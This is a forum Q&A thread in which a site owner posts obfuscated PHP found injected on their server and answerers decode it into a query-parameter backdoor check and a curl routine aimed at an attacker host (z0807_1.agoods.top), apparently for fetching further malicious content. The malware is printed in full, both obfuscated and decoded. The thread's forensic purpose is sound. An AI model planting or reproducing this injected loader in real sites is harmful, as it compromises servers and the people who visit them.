# How to deobfuscate a PHP code that is written as below?

Tags: php, obfuscation

I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.

```
<?php 
@header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c"; 
global $O; 
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9}; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}
```

Comment: If this has appeared on your server and you didn't put it there then you've been hacked. Delete the entire site and restore from the last clean backup.

Comment: Did you find this code in only 1 of your scripts?

Comment: What I've found out is that this script is trying to load the content of your current file and send it to a url named : `http://z0807_1.agoods.top`. This url is hidden within `$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$aa.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};` where `$aa` is = `z0807_1`

Comment: If you see that some unknown code have been added to your site, then wipe the server and make sure you set it up again following all best security practices. You should also do an audit of your code to make sure it doesn't have any security issues. When that's done, redeploy your site. It doesn't really matter what the code does since if someone have been able to put one piece of code on your server, they can probably put other stuff up there as well.

Comment: If this is really all that got added then the curl should not have been executed (yet).

Answer (score 1, accepted):

You can unravel this step by step.

There is this `$OOOOOO` string which then URL-decoded into `$O`, which yields the following (which looks like going through the keyboard row by row):

```php
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
```

From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these `$O{x}` bits with the actual characters (I used a regex replace):

```php
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "["."o"."k"."!"."]";
        exit;
    }else{
        echo "["."f"."a"."i"."l"."!"."]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}
```

We can then combine those strings to make them more readable:

```php
if($_GET["chen"]=="51-cn"){
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    $oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top"; 
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    $ooooOOOooOo=curl_init();
    curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
    curl_close($ooooOOOooOo);
    return $oooooOOOOooO; 
}
```

Now let's rename the confusing variables:

```php
if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}
```

Next, let's split up the long line inside of the function:

```php
if($_GET["chen"]=="51-cn"){
    $varA = file_get_contents(__FILE__);
    $varB = explode("<?php",$varA);
    if(strpos($varB[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$varC='z0807_1';
$varD="http://".$varC.".agoods.top"; 
function someFunction($varE){
    $varF=curl_init();
    curl_setopt ($varF, CURLOPT_URL, $varE);
    curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
    $varG = curl_exec($varF);
    curl_close($varF);
    return $varG; 
}
```

As a final step, we can guess better names for those variables:

```php
if($_GET["chen"]=="51-cn"){
    $thisFileSource = file_get_contents(__FILE__);
    $parts = explode("<?php",$thisFileSource);
    if(strpos($parts[1],'%71%77%65')!==false){ 
        echo "[ok!]";
        exit;
    }else{
        echo "[fail!]";
        exit;
    }
}

$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top"; 
function sendRequest($url){
    $curl=curl_init();
    curl_setopt ($curl, CURLOPT_URL, $url);
    curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
    $result = curl_exec($curl);
    curl_close($curl);
    return $result; 
}
```

As for what this code does: If this is called with query parameter `chen=51-cn` in the URL, it checks if the current file contains the start of that `$OOOOOO` string in the first PHP code section, and if it does, it returns `[ok!]`, otherwise `[fail!]`. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just `echo "[ok!]";` would have sufficed...) Additionally, it prepares a request to `http://z0807_1.agoods.top` but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for `ooooooooOOOOOOOOoooooOOO`.)

Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like `Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7`. (How ironic, given that in the *injected* code, error output is suppressed.) Browsing these sites (*which I did with a lot of care, so you don't have to!*) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on `zXXXX_X.agoods.top` and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.

Answer (score 1):

Because i always wonder what to expect if this would happen to me
i looked up what this code does.

First the commented code, and below the comments only.

***DO NOT execute this on your machine!***

```
// Sets header ...
@header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
//                                                                             ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
    // Load this file into var.
    $oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
    // Explode by "<?php" (makes no sense to me).
    $oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
    if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
        // then echo "[ok!]" and exit
        echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
        exit;
    }else{
        // else echo "[fail!]" and exit
        echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
        exit;
    }
}

// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)

// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
    // Init curl.
    #$ooooOOOooOo=curl_init();
    // Set url (given function param).
    #curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    #curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
    // 5 sec connection timeout.
    #curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
    // Execute and set response to NEW var.
    #$oooooOOOOooO = curl_exec($ooooOOOooOo);
    #curl_close($ooooOOOooOo);
    // Return new var content.
    #return $oooooOOOOooO;
}
```

Here the "just comments" part.

```
// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
    // Load this file into var.
    // Explode by "<?php" (makes no sense to me).
    // If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
        // then echo "[ok!]" and exit
        // else echo "[fail!]" and exit

// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)

// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
    // Init curl.
    // Set url (given function param).
    // CURLOPT_RETURNTRANSFER = 1 to not echo out response.
    // 5 sec connection timeout.
    // Execute and set response to NEW var.
    // Return new var content.
```

So this looks to me like

- not the complete code that got injected
- done by a bot that checks if the injection was successfully
- a script to load more bad code into your project on deamand.

Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
**But i dont know that.**

Comment: It is not a complete code, I shared some of it. Thank you